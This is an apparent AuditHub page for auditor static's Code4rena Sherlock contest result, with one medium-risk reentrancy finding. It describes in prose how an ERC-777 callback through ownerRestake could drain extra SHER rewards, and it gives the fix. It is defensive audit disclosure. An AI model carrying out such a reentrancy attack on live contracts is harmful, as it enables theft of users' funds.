Back to static's contests

Sherlock contest - static's results

Decentralized exploit protection.

General Information

Platform: Code4rena

Start Date: 20/01/2022

Pot Size: $80,000 USDC

Total HM: 5

Participants: 37

Period: 7 days

Judge: Jack the Pug

Total Solo HM: 1

Id: 76

League: ETH

Sherlock

Findings Distribution

Researcher Performance

Rank: 7/37

Findings: 1

Award: $3,287.14

🌟 Selected for report: 0

🚀 Solo Findings: 0

External Links

Code4rena Contest PageGithub Contest RepositoryGithub Findings RepositorySherlock

Findings Information

🌟 Selected for report: kirk-baird

Also found by: static

Labels

bug
duplicate
2 (Med Risk)

Awards

3287.1415 USDC - $3,287.14

External Links

Link to GitHub issue

Handle

static

Vulnerability details

Vulnerability details

Impact

If the SHER token performs a callback, such as in ERC-777 tokens, when performing transfers, the _sendSherRewardsToOwner function can be run multiple times to extract more rewards than should be available for a single NFT.

Proof of Concept

The attackers stakes Sherlock for the minimum period and transfer the NFT to a contract with a fallback that calls ownerRestake when called. Once the period is up, they call ownerRestake from the contract (using the fallback), which triggers multiple more ownerRestakes before returning. This causes the contract to call safeTransfer multiple times giving them more reward than they're entitled to.

Tools Used

N/A

delete the sherRewards_[_id] prior to transferring the SHER token to the user.

#0 - Evert0x

2022-02-03T22:31:55Z

https://github.com/code-423n4/2022-01-sherlock-findings/issues/60

AuditHub

A portfolio for auditors, a security profile for protocols, a hub for web3 security.

Built bymalatrax © 2024

Auditors

Browse

Contests

Browse

Get in touch

ContactTwitter